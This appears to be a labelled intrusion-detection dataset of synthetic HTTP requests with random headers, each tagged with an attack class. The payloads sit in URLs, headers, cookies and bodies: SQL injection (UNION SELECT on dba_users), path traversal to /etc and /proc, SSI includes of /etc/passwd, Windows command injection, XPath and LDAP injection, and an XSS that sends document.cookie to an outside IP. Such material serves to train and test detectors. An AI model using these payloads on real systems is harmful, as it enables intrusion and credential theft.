Content-Language: tkhn,pn
Content-Encoding: identity
Content-Location: /0boa/tTtht.fgf
Content-MD5: OG5BdDNpcnNhYXJvZWh0dQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 21 Mar 08 18:13:04 UTC
Last-Modified: Thu, 09 Mar 06 03:45:20 CET
Host: www.ehaf.ch
Connection: exng
Accept: */*
Accept-Charset: iso-8859-2;q=0.1, windows-1254, windows-874, windows-1251, x-mac-korean;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 53.2.228.212
Cookie: emeStTeOat=t6
Cookie2: $Version="0"
Date: Sun, 21 Mar 10 15:17:32 UTC
ETag: W/"_uuPg0cLnphDTjTe"
Expect: 100-continue
From: HsznrM@xmaxp.fr
If-Modified-Since: Tue, 06 Nov 07 18:09:18 UTC
If-Unmodified-Since: Fri, 02 May 08 19:41:55 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 27 Mar 10 20:14:57 CET
Max-Forwards: 934
MIME-Version: 9.1
Pragma: h3kpu='EAise'
Proxy-Authorization: g1mS irhsrss=Lpnmb
Authorization: Basic ZG1lY21jOm5pbHE=
Range: -790
Referer: /iAann/tedecoi.js
TE: chunked,deflate,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/6.6 (compatible; Konqueror/6.3; Unix; siiv39lht; 2qsi)
UA-CPU: MIPS
UA-Disp: 4346,951,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 537x7894
Via: 5.6 30.229.92.116:976, uhptG/9.5 245.142.8.51, awe3e/8.4 49.110.174.190:5745
Transfer-Encoding: letij
Upgrade: sdW/7.9, agrd/5.9, wt6wa9/7.2
Warning: 179 www.uasae.gif "peEehwtea6n8inr" 
X-Forwarded-For: 59.28.178.137
X-Serial-Number: 3374825125599046
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oataostaHytudlm=/6zqhah%eoocftprae[&neklGfeeu3lh22=6oplibidwircpetmpb?re$ deval%u&onnogsaisxsb8=ed9Su "       style=left:expression(alert("  nt.pa4eye "))   alt    =    "&5dpnnrq7=6031&jXh=tGl5&aelDyBs=4nvh

End - Id: 46926
Start - Id: 42697
class: SqlInjection
PUT /rldrTs.png? HTTP/1.1
Content-Length: 133
Content-Language: 9hs5ssar,9
Content-Encoding: deflate
Content-Location: /hhun7td/nedrblof/uhot/0Npm6/abeblna.cfm
Content-MD5: ZGhncXdyem5hdWlZcmVvcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 14 Oct 06 21:52:47 GMT
Last-Modified: Fri, 22 Jul 05 15:27:34 CET
Host: www.cei9erk.st:80
Connection: close
Accept: application/*
Accept-Charset: euc-tw, x-mac-chinesesimp, x-mac-turkish, iso-8859-1;q=0.6
Accept-Encoding: compress;q=0.1, deflate;q=0.6
Accept-Language: *
Cache-Control: max-stale
Client-ip: 139.253.185.119
Cookie: ao9apDrtope7ha=o.Y;edk=tarEJeA;xhfg=6536;iNaruiilm=haheed
Cookie2: $Version="592"
Date: Mon, 17 May 04 07:44:36 UTC
ETag: W/"yCxBZS3Kyg8dm6bXO_"
Expect: iscornt=Rl3N;5pitn=bjcog
From: 1nnTne@iveby3la.uk
If-Modified-Since: Tue, 25 Apr 06 02:40:05 GMT
If-Unmodified-Since: Wed, 21 Dec 05 13:07:56 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 08 Jun 09 06:19:03 GMT
Max-Forwards: 592
MIME-Version: 8.0
Pragma: oe4sr=cn7eevn8
Proxy-Authorization: Digest opaque="bii1e"
Authorization: NTLM eWFubm9pZWVvZTRodXJpZml0aThyZW5wemUzb25hNG9rcnMyRQ==
Range: -04,546226-,740980-
Referer: http://raaeih.gov/o0lre.mspx
TE: trailers,chunked;q=0.4
Trailer: Connection
User-Agent: chairs'   UNION SELECT hhednob   FROM dba_users  WHERE   name   like '%25
UA-Disp: 179,0813,8
UA-OS: Windows 98
UA-Color: color16
Via: HTTP/1.3 www.dhmkn.shtml, 6.3 www.raopdi.htm
Transfer-Encoding: identity
Upgrade: yhsa/7.0, ltu/5.5, 8is/5.2, litm/1.8
Warning: 910 www.idcir.shtml "6amsbimteinud6eDrte" 
X-Forwarded-For: 29.202.205.12
X-Serial-Number: 0088484140288112965
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

nenrwnfarfeo=48626&nAne47ouvrmkgs=fisfv5tiraT&rr=1851409&acstC8gjrnkfC=ekwda0awga&Und=tperlqt2irat&arisf=bodyq=Mirr&8eAt7hr2xah=5hu

End - Id: 42697
Start - Id: 36331
class: PathTransversal
GET /kH.tiff?6hJxmgkH=cecius0&ldwnal=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2FaT.conf HTTP/1.0
Host: www.yr8oshhd.cz
Connection: close
Accept: video/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: g-d0kh;q=0.6
Cache-Control: no-transform
Client-ip: 179.242.140.245
Cookie: tleDraroftytira=?ter;aotMlreXtPi1=nveTcb;RYlogK5jPtX2P=52246655
Cookie2: $Version="430"
Date: Wed, 10 Dec 08 06:04:01 UTC
ETag: "YheWX8B.bpdlJCw5@ydv"
Expect: 100-continue
From: potfI@7waa4m.be
If-Modified-Since: Thu, 28 Feb 08 12:18:39 UTC
If-Unmodified-Since: Sat, 09 Jun 07 09:00:22 CET
If-Match: "2brndKdCMduww7PH"
If-None-Match: "V1g.c7tKpkD-c1bIlm7X"
If-Range: "9gHKbecVyHiF-0y.Y"
Max-Forwards: 50
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: NTLM dWVlN2U5Y2RoYmN0b2h0dGRlb21zbHRhMXQ4aG5zeW5yZWR0ZGJ0aA==
Range: 94941-674,-88804,1546-98301
Referer: /otsD.msf
TE: trailers
Trailer: User-Agent
User-Agent: hsSrrhleuz (oAaCl83J; twN.YXNMv)
UA-CPU: MIPS
UA-Disp: 617,065,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 625x983
Via: 0.7 114.197.200.42:9048, atf61i/5.8 www.niaar.htm, 1.3 122.137.121.36
Transfer-Encoding: gzip
Upgrade: itor/5.7, 4up4ta/3.2
Warning: 156 85.95.63.97 "Leweeelritieh" 
X-Forwarded-For: 112.141.222.2
X-Serial-Number: 876584717
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36331
Start - Id: 39532
class: SSI
GET /qeoimenejsr/tF4/1R3lHLdrop/cPvbUSpmm.C74lwYrYS/aaqtdhndEph3elrdiea/Xkr1yario/sock_streamSUcmdTLS_C-qAC/sjstdinEi1tD/seawgdsoeetiYeuaoy/bnoulino/wp-usrU93processing-instructionPnL2@u.mspx?wRwql0slti=089&1Iieetrg=arnetcatnrdm&lpscem=nk+ HTTP/1.0
Host: www.moimn.be
Connection: keep-alive
Accept: audio/x-wav, image/gif;q=0.1, application/*;q=0.3
Accept-Charset: *;q=0.8
Cache-Control: no-store
Cookie: riAsa2abweha=oJnTeh;NeHaamr=e &s;Z3HzRevaliO=500772;http.N3P=Lho0;lO8eczd8etoe4a=in6M9l1;nev2lsnimy=<!--  #include virtual="/etc/passwd"  -->
Date: Thu, 19 Feb 04 23:30:52 GMT
ETag: W/"4.eIMH-URnAWUU1F"
Expect: 100-continue
If-Modified-Since: Fri, 01 Aug 08 04:19:44 GMT
If-None-Match: *
Referer: /9eon/codrnha/Lsor/etqOltn.wmn
TE: gzip;q=0.5
User-Agent: neemnotpc/6.7.2.1
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 39532
Start - Id: 46043
class: PathTransversal
GET /yZX3023MqCVbYL.xlu/rb62dazS/2jQ8Ex1IIs.s.uzK9/3vzq.v.25rSaQ@/V9pnadminconnectv52J/qa/niOhTAYL3cpv@TMGK3w/KTz-XLAWJU.html?hfwnaLflaict=0993&ivkuhod=tse%2F&vdaEtteah86Euts=c%28%7E&7C18fI=xqbodyo%5Dlmh+tpasswd+Ow&ietssstruofma=yaetegnsmail&0haealnxnohh1=mrhuEhssviti&opO6zvyirjbfmr=lttkmeT HTTP/1.0
Host: 43.10.93.144:83
Connection: lTb6se9
Accept: text/xml
Accept-Charset: cp-936
Accept-Encoding: ../../../../../../proc/version
Accept-Language: iLsue5-sibd, abevla-diNlm7H;q=0.7, aisek-8neai;q=0.0, rRnf-dReolerp, epiiadlr-xt6
Cache-Control: max-age=257
Cookie: reaahuojnctta=wlee 
Cookie2: $Version="16"
Date: Wed, 24 Aug 05 15:21:15 CET
ETag: "z2QQhBt9DT6xM8jE7J"
Expect: 100-continue
From: eooY@ned2wr.ch
If-Modified-Since: Thu, 14 Aug 08 20:52:25 CET
If-Unmodified-Since: Sat, 16 Jul 05 23:27:44 GMT
If-Match: *
If-None-Match: "f-3B81HSt.uOzTxeP1.F"
If-Range: Wed, 17 May 06 05:15:43 UTC
Max-Forwards: 80
Pragma: doherhS='nE5igai'
Proxy-Authorization: NTLM bGNucmtpNGVyQXRvZFVvYXJpZXNtaXpzZGljbmJzb3RzbGlGMWxHbg==
Referer: http://www.dudt.it/rt2fet.pdf
TE: deflate;q=0.5,gzip,deflate
User-Agent: ltoznRe4na (pyD0JDN; 2QIh7fn8@o)
UA-Color: color32
Via: 4.5 6.192.235.238:631, ZHioa/8.9 www.otlteaa.gif:6812, FTP/2.8 www.lmuxaeep.jpeg
Transfer-Encoding: deflate
----: --------------

null

End - Id: 46043
Start - Id: 42569
class: SqlInjection
GET /dpg8xhtwciF3lc/s6EGghC2M8vqqqk/mJ-gEgFDOCNkGplG/toMri/qm/daCSt4i51/w1ailnbeiTi/a6zgcJ_YRn1YQmYlHE_/pgOcAUcd.jsp?etiicusnyaan=00LsdQ&enecdmd=n1aeqfi+2%3Dte%25o6%3B&al2=swVxEt&cue=oshe&ucjgoujlEp3=3967136291&oonrextDo2cg=03007&4Eo=Tihira7yacle&jeUnneoseiwh=%27+++++OR++%27q5n%27++%3E+++%27S&Fi2FMY=ht6ta&I6SM=oqeb&ue=htpasspnlshesnd HTTP/1.0
Host: 82.120.126.236
Connection: close
Accept: video/*;q=0.9, text/xml;q=0.6, audio/x-wav;q=0.5
Accept-Charset: cp-936, us-ascii;q=0.6, iso-8859-1, koi8;q=0.1, x-mac-arabic
Accept-Encoding: 
Accept-Language: ati-rbhJyet;q=0.8, tas-tiahToO;q=0.1, b-e9sifth, sAcws0N-p, Th-snbEydrs;q=0.9
Cache-Control: max-age=40161
Client-ip: 197.109.140.61
Cookie: .UlinknXQ=032699;6NEsseyunHr=ntl;dImthd1ytdireae=aio2uz;iZquokte8owr=acecinHo&yeehe;geapn0=lGmoA
Cookie2: $Version="57"
Date: Fri, 30 Jul 04 24:01:53 UTC
ETag: "AIbTkMC-@CHeNXLDldey"
Expect: shrot
From: tmTstilr@oerx.it
If-Modified-Since: Sat, 10 Apr 04 07:19:20 CET
If-Unmodified-Since: Sat, 29 Aug 09 18:02:08 GMT
If-Match: "ko-up2h_R5he46_b"
If-None-Match: *
If-Range: Thu, 03 Sep 09 22:22:36 GMT
Max-Forwards: 77
MIME-Version: 0.5
Pragma: no-cache
Proxy-Authorization: NTLM ZXRlYWFyc1RlaHJzNlRuMGVlc293dGV1c2tlb3Boc2J0c3M5OWVjdGhod3ph
Authorization: feet elTus=lwzomle
Range: -05,8037-,228664-
Referer: /eanvn/bcntje/dii6sH.asp
TE: chunked,trailers,gzip;q=0.6
Trailer: Expect
User-Agent: Mozilla/0.4 (compatible; otzlJ; Open BSD i586; ihnsla9oe)
UA-CPU: MIPS
UA-Disp: 4287,1140,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 161x8196
Via: FTP/4.3 58.67.60.106
Transfer-Encoding: gzip
Upgrade: idlsll/7.2
Warning: 740 www.flc6.js "aobefTi4oh6lxaa" "Sat, 01 Jul 06 04:47:36 CET"
X-Forwarded-For: 149.227.177.29
X-Serial-Number: 81684
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 42569
Start - Id: 36499
class: OsCommanding
GET /scripts/..�../..�../mssql7/install/pubtext.bat" & dir c:\ .exe? HTTP/1.0
Host: 115.24.95.100:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: S-suL;q=0.3, rxm5eru-lncn4, TLiixb-rf6xqv, bfva-iyOhtmt
Cache-Control: no-transform
Client-ip: 71.53.140.2
Cookie: o5=Iowe;pTohpnoeeas3nto=iro;ipad1g=54;tanrEseRbete=fipassthruE 'm
Cookie2: $Version="050"
Date: Sun, 17 Sep 06 23:07:55 CET
ETag: "PbL-0SjZXzb3X6N9tt"
Expect: atcEeo
From: oliee@2ucHyiTL.org
If-Modified-Since: Sun, 09 Aug 09 09:21:51 CET
If-Unmodified-Since: Thu, 21 Jan 10 17:11:10 UTC
If-Match: "lMqOAnisi3zsqiE"
If-None-Match: *
If-Range: "_z.zCFUN3Jq.GaGGwX6"
Max-Forwards: 2136
MIME-Version: 0.0
Pragma: ots98=o
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: Basic cmVlb0UwcjppcmVtdHlhZA==
Range: 998505-,-0540,815-
Referer: /7iahtp/e5sone.gif
TE: trailers,trailers,chunked;q=0.5
Trailer: If-Modified-Since
User-Agent: Mozilla/7.4 (Machintosh; U; PPC Mac OS X 9.9; e6-ht; rv:6.1.6) Gecko/06429467
UA-CPU: MIPS
UA-Disp: 5117,829,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 512x1298
Via: esr/2.8 113.183.178.105
Transfer-Encoding: gzip
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 640 191.249.103.192:8645 "na5Hiio6yds" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36499
Start - Id: 49635
class: XPathInjection
GET /Hmlmg/rUn5kja/bA6G-/nioyleafLcwYvRh2/9twReaMpteetceLryt1/rzfi5yhhaoyedlt.css?swrq6etn=tilft6u&esti6e6caeeaiq=330&ikt=ere&dRPH.nbgsound=dj8A%27+or+++%28i+%3C++count%28umto%2Fchild%3A%3Atext%28%29%29++++and++++j++%3C+++++count%28jfdW%2Fchild%3A%3Acomment%28%29%29+++and+++k+++++%3C+++++count%28tl%2Fchild%3A%3A*%29+%29+++or+++++%27udfona%27++++%3D++%27++lnTrny%27+++++or&UikoEncearae=93756&sec=srcW&qvod=bZ4VOz2YwYu%40&etzkX7r=rurme HTTP/1.0
Host: 76.229.171.242
Connection: tncrnir
Accept: */*
Accept-Charset: windows-1250
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: ic=nEh
Client-ip: 168.133.90.250
Cookie: sl0htIx=t;einh9ke6tenht=ldop2tiframe4l;eae=uet\;EqRe=264832
Cookie2: $Version="94"
Date: Thu, 18 Mar 10 12:44:26 UTC
ETag: W/"7xooxmITc3kLOw7U-@"
Expect: roznzstA
From: nUasei3i@d2es4pty6e.biz
If-Modified-Since: Sat, 05 May 07 16:23:39 CET
If-Unmodified-Since: Wed, 17 Mar 04 15:57:59 GMT
If-Match: *
If-None-Match: "nrSLm7eJrHVLW8u"
If-Range: "iIKqlU8PYb5gu_scVhG"
Max-Forwards: 4543
MIME-Version: 1.5
Pragma: t2trt6=vsaT
Proxy-Authorization: NTLM bTdJZm9od3JhZXRidXJsMGJlbWtkemQ3RXVyZWVzanJkbHNnbjI=
Authorization: Buae mojX=Miuace
Range: 31-025167,936-84
Referer: http://fttekn0a.ch/axss/m2re6/wHherSek/leaUr.wav
TE: trailers,trailers,trailers
Trailer: Pragma
User-Agent: 2xoxtaaeta/4.0.7
UA-CPU: PowerPC
UA-Disp: 3477,0438,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 3223x940
Via: 5.1 www.wogc.jpeg
Transfer-Encoding: compress
Upgrade: hZair/3.0, n6coi/9.2, gii/4.7
Warning: 524 www.ufdAk.gif "c7tvlttbVv" 
X-Forwarded-For: 89.198.76.55
X-Serial-Number: 903451462
----: -------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 49635
Start - Id: 40590
class: SSI
GET /tisrt/Ruido52iwilnnsz4tg1s/eKT@qAL5z9/rb9zd1b/0EhuUwX6ZdA5GGePO/cdnMzrepcl/lsdobject.7Z2DR93t9.shtml?KSdtoil@HneA=%3C%21--++++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22++++--%3E&aisblztr8erge=22&hsNnas8aahF24a=es%3Dn+d&tTaoih=lQJD.tHyg&bdMosmfl=7i3&yjYY=lvbscriptia&ubeah=liioeoT0eeus&henenmttLZT=mifrom%24&Bchildhttp6BQ=n7dpniNYur1yinis HTTP/1.0
Host: 38.254.193.130
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: compress;q=0.7, identity, compress;q=0.8, deflate, gzip
Accept-Language: lw-4tFsbTo;q=0.8, N-sleeoO, ivax-efyo3ii;q=0.0
Cache-Control: tga566n='tNosNi'
Client-ip: 25.93.112.146
Cookie: 8a1ores=259336813;aeUe=280;h4ifces=oihtaccesh;mgttenwN=08;ylshagdm=zbncawonastt;mtmtmi=72
Cookie2: $Version="3"
Date: Tue, 23 Nov 04 18:23:58 UTC
ETag: W/"bb110ijb0AjJQj0"
Expect: 100-continue
From: tiotlhOg@Ee0em4sr8.gov
If-Modified-Since: Sun, 30 Mar 08 22:07:43 GMT
If-Unmodified-Since: Mon, 17 Jul 06 01:41:09 UTC
If-Match: *
If-None-Match: *
If-Range: "kqisXVMKs4pOTWl_"
Max-Forwards: 36
MIME-Version: 2.0
Pragma: no-cache
Proxy-Authorization: NTLM YWhlYXFlbmhuY2U4aHlhdGxOZWk1ZGVtdG91QTVsMXJycWVtZWRmZTFoNG9sTnI=
Authorization: Digest algorithm=MD5-sess
Range: 9102-264,3606-,-14
Referer: http://www.tneifrAs.net/nafsu.png
TE: trailers,deflate,trailers
Trailer: If-Range
User-Agent: tZ5kbIq http://www.azMlYnhr.it
UA-CPU: StrongARM
UA-Disp: 2015,473,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 972x7445
Via: FTP/6.4 55.207.231.13, ex2r6/2.9 136.83.100.0, HTTP/4.1 1.91.195.76
Transfer-Encoding: compress
Upgrade: sez4st/8.2, mnseuu/1.0, fszf/8.0
Warning: 737 www.suaxgW.shtml "9arerm" 
X-Forwarded-For: 142.48.24.138
X-Serial-Number: 69115
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 40590
Start - Id: 42826
class: OsCommanding
GET /isa/jtkbe8heaSoa/nnUOpCTb1y4K.ojvmVX/sWUQ/naetTuuhcthmsYoep/nlSo-EQ6/oQ.Lf0_o69g/tfb6qkzEOo2r/cVc3JnXfAiUYa_bIwAGT/positionPoIZio@K.bin?iso=%7Cdir+++..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C..%5C%5C+%2C&@BXhtpassjJVK=e%5Cd4t&sl5LeeYYlhone5=eZTswwmoWhU&cwportpliccwm=%29&bDDZ=nal9 HTTP/1.1
Host: 8.152.97.128
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: I-Iti, 9b-awn;q=0.0, ueMrs-ud
Client-ip: 188.218.7.177
Date: Mon, 08 Aug 05 18:32:04 UTC
If-Match: *
MIME-Version: 5.9
Authorization: Digest username="yrohn0"
Referer: http://www.qiem.de/toie/2er7ntn/tcteaadv.gif
User-Agent: efndueaRlo (sC.Q5qP; s5lGPe; bi0XJN5S; h_vSTRhU)
Upgrade: bnrh/3.5, tht/4.4, eRslr/7.1, uitl/9.3, nply/0.8

null

End - Id: 42826
Start - Id: 37594
class: LdapInjection
POST /bj/sIo/teyoweaansobazoocaed/hRhRDpskecSssstyn/acceptPqN3/Gvpn3tbiimlbah5sg79o/9w89f_.-M7Oinsert.gif? HTTP/1.0
Content-Length: 258
Content-Language: asm,lmiurts,bpeohees
Content-Encoding: identity
Content-Location: /6sdnr3o/oeesieua.pl
Content-MD5: eXByaWFyaWlvN2llZXJyMA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 24 Oct 05 15:41:05 UTC
Last-Modified: Thu, 19 Apr 07 11:35:51 CET
Host: 104.108.199.115
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: compress;q=0.2, identity, compress
Accept-Language: s-9ifOhmd;q=0.5, mrg-cjxgnaf;q=0.8, ihao-1;q=0.3, oAata-iepAz
Cache-Control: max-age=99778
Client-ip: 99.181.231.1
Cookie: V@K@4RE.H=8ZF
Cookie2: $Version="063"
Date: Sat, 05 Sep 09 16:04:58 UTC
ETag: "@QX@_ywUL101QKMd"
Expect: 100-continue
From: atns@eiaaaj.fr
If-Modified-Since: Sat, 09 Jul 05 08:39:11 GMT
If-Unmodified-Since: Sun, 02 Dec 07 11:15:13 UTC
If-Match: "cNDMqEjUm2--epdjG64C"
If-None-Match: *
If-Range: Mon, 05 Jun 06 21:42:35 GMT
Max-Forwards: 844
MIME-Version: 4.3
Pragma: C=cdyales
Proxy-Authorization: Digest qop=Sogaol
Authorization: E0D6 toUen=M8keim
Range: 3-46,1783-444359
Referer: http://ii0y.org/utl5ih/c6h2ls0.pdf
TE: deflate;q=0.6,chunked
Trailer: Accept-Language
User-Agent: Mozilla/7.7 (Machintosh; U; PPC 1.1; dL-km; rv:7.2.7) Gecko/24607062
UA-CPU: PowerPC
UA-Disp: 0007,792,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 770x317
Via: usho/0.9 67.48.242.149:7588, FTP/3.3 245.244.122.0
Transfer-Encoding: gzip
Upgrade: vYs/1.2
Warning: 943 www.FaAepr.shtml "i9ws4h7nus" 
X-Forwarded-For: 111.32.250.246
X-Serial-Number: 35061677814454
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

echoU_DbVGWJnca=ee8eabrRmhvibotu3t&2I5nluOesaD=920350&weerNiki2=986164&uolueCeop=3&8td8oi=dOEid&so=ra9ham&eihs6rlooncrLv=reUkncaoionann0ai&ijfNlmao=90&hz=349&ai=4&crEocavmaoshsr=")(targetfilter=(o=NetscapeRoot))&7mstnp8tla=k5J7w&4THULfbr=M4i4

End - Id: 37594
Start - Id: 47127
class: XSS
GET /ea/eue01xl/vthoyom/eQK3-cvOGDtn@/uydvIMd1xOc6V1vlK.swf?NimgTrNH=ii&asbdriesrh=373&emesce7hlezc=tabqeiio+eddbetweenhhd%3F&i6oeaOEieru=229&uEorr3cRr=95&ancnNe4oloehiie=httptkv&eLmD=iDyxy60G5g&lncr0ndtojmie=%3Ca+++++href+++%3D++%22++about%3A%3Cs%26%2399%3Bript%3E%5Bwindow.open%28%27http%3A%2F%2F19.195.102.173%2Fetve.jsp%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E+++++%22++%3E&mo5ieiatE=dn3nhhEsystemhomes8oAn&ei=Hl%7E HTTP/1.0
Host: www.rsytbsu.gov
Connection: close
Accept: video/*;q=0.5, audio/*;q=0.1, video/*;q=0.6
Accept-Charset: windows-1252
Accept-Encoding: compress;q=0.2, deflate, deflate;q=0.2, compress;q=0.9, identity;q=0.2
Accept-Language: heu-tur, kvy-geh, fsrjes5-aeoj
Cache-Control: max-stale=41866
Client-ip: 130.149.173.192
Cookie: c4feIaxp4=utae~;lsao=tHxIj
Cookie2: $Version="5"
Date: Tue, 02 Feb 10 18:45:52 GMT
ETag: "mQNu2WqrXNJIUGh7"
Expect: 100-continue
From: dy0mird@eelb.it
If-Modified-Since: Fri, 23 Feb 07 16:56:02 CET
If-Unmodified-Since: Sat, 25 Nov 06 06:53:58 CET
If-Match: *
If-None-Match: *
If-Range: "pkvVXtr2O-4U7WTH"
Max-Forwards: 46
MIME-Version: 5.8
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Basic NW90cnU6cjB1bW55
Range: 38-13,-4
Referer: http://aLiftu.be/tnchseeA/vIc6/lsnntbnm/vachl.jpeg
TE: gzip,trailers,chunked;q=0.4
Trailer: Warning
User-Agent: s3ku5K http://www.seoi.cz
UA-CPU: 68000
UA-Disp: 016,6175,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7372x166
Via: 3.4 121.10.1.78, fncc/4.0 56.96.91.18:704, FTP/7.3 86.72.132.212
Transfer-Encoding: gzip
Upgrade: suae0/1.2
Warning: 339 51.64.209.7 "6Kirtt2tetFxoo" "Fri, 17 Oct 08 02:00:42 UTC"
X-Forwarded-For: 32.49.185.177
X-Serial-Number: 42655
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47127
Start - Id: 39849
class: SSI
POST /he7nhed3/eTZvee/er7/7Mphx20TZ/4Fxzf9group byo.swf? HTTP/1.1
Content-Length: 166
Content-Language: fa5us,raat8o,xrseo
Content-Encoding: identity
Content-Location: http://92rmlqA6.gov/c5wg.asp
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Feb 07 08:07:18 UTC
Last-Modified: Sun, 30 Aug 09 04:32:37 CET
Host: 40.108.237.206
Connection: t1euea
Accept: video/quicktime
Accept-Charset: x-mac-hebrew
Accept-Encoding: *
Accept-Language: m1-q
Cache-Control: no-transform
Cookie: yhxwl=oron (;bMjfuveyee=16168;1z0hsue4=<!--     #include virtual="/etc/httpd/httpd.conf"    -->
Date: Tue, 10 Oct 06 22:10:42 UTC
If-Modified-Since: Tue, 26 Sep 06 16:47:09 CET
If-Unmodified-Since: Sat, 18 Sep 04 03:19:56 CET
If-Match: "sm1h-3VhZcwehVnl"
If-None-Match: "n1N_EoeOhQ9@qFAjdT"
Max-Forwards: 1
MIME-Version: 6.8
Pragma: st=tbqs
Authorization: Digest opaque="ctws"
Referer: /gNlu/netiDf/anv5tVn/mqbnsi/rnhorn.dll
User-Agent: xee8chnjli1NaoEK
Via: HTTP/9.9 176.201.251.98

iesosme3=4900796&3ye=rp8tlogkrrrht&0ddhwxv=e&gdrheroct=eaccept/<&Trsgghr1nd=917099&xld=ideq &ss4Naonioa=dU5l7BMU&BIvoZ9XAI=lg2ektUac25s&iyee1ele=td691&ylretor5o=d

End - Id: 39849
Start - Id: 41046
class: SqlInjection
GET /h@X4BMLRCSFjVWw/ep0fTTlZePFhWh/et/y6a4tgaxH/f7x/6inaxV7/kEigcyt1zla8dn0or/bblHyNxozq-GCndSL/ttn/d7qu/rPg/hsaio.html?TeuctMe=nhd&eoseCexearo=bulk+++++insert+++++xiysvbmc+++from+%27pwdump.exe%27++++++++with+%28codepage%3D%27RAW%27++++%29&KEfrom9_document=63&passwdQKC=shutdown0t&ymroII=e3%40-YJe&nEbacd9dc=mh&9anzii=1406&wasaNsta=f%2Bged+l%26po%5Cra%2B%3Ft%3E%5Ds&wj=6881&ornsalysr=icmdCusry%25x%26nzlaoRtRd HTTP/1.0
Host: www.sotyeoiwe.st
Connection: joeli
Accept: image/jpeg;q=0.5, application/zip;q=0.0
Accept-Charset: *
Accept-Encoding: identity;q=0.4, compress, gzip;q=0.4, deflate;q=0.2, compress
Accept-Language: *
Cache-Control: no-transform
Client-ip: 228.241.241.37
Cookie: tNsyyncnumr=t06sa$iad7;eo;isuhtlqIrE=noyn=tzaei4nhi
Cookie2: $Version="90"
Date: Thu, 03 Jul 08 15:58:08 UTC
ETag: W/"_WrR1Ly1ZlOqxyWv2v9n"
Expect: issottp
From: ZU4adNb@HtspshaDre.fr
If-Modified-Since: Sat, 28 Jan 06 16:36:47 CET
If-Unmodified-Since: Tue, 07 Nov 06 15:30:30 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 06 Aug 06 04:04:44 CET
Max-Forwards: 6
MIME-Version: 1.6
Pragma: a='ge'
Proxy-Authorization: dEwdh oSgoauto=ctAcmei
Authorization: usdeqo aankat=dlpyl
Range: 7-04,570-
Referer: /lro7na/ot6wl.asmx
TE: trailers,trailers
User-Agent: Mozilla/7.9 (Windows; U; Win98 6.0; a9-ea; rv:7.0.4) Gecko/69433961
UA-CPU: PowerPC
UA-Disp: 439,0025,16
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 381x817
Via: HTTP/2.5 www.ibheu0.htm, HTTP/1.9 140.49.10.245, HTTP/5.0 www.86h8voir.jpeg:0343
Transfer-Encoding: compress
Upgrade: rqi/9.1, ehxi/6.6, pyu/0.2
Warning: 050 www.r6ioleOa.htm "witutEd" 
X-Forwarded-For: 57.95.233.202
X-Serial-Number: 54708069609443708
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 41046
Start - Id: 45226
class: PathTransversal
GET ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////? HTTP/1.0
Host: www.5ekttqi7li.com:80
Connection: close
Accept: */*
Accept-Charset: shift_jis, iso-2022-kr;q=0.2, isiri-3342, iso-10646-ucs-2;q=0.4
Accept-Encoding: 
Accept-Language: 8-2evoncj;q=0.0, eliti-6ylz
Cache-Control: max-age=9
Client-ip: 98.132.36.144
Cookie: co2toe1=so
Cookie2: $Version="85"
Date: Tue, 10 Nov 09 21:24:21 GMT
ETag: W/"bOlPDswTjl-nC3LOx"
Expect: hslN
From: sgrttcno@xhaofa.gov
If-Modified-Since: Sun, 09 Apr 06 13:49:28 CET
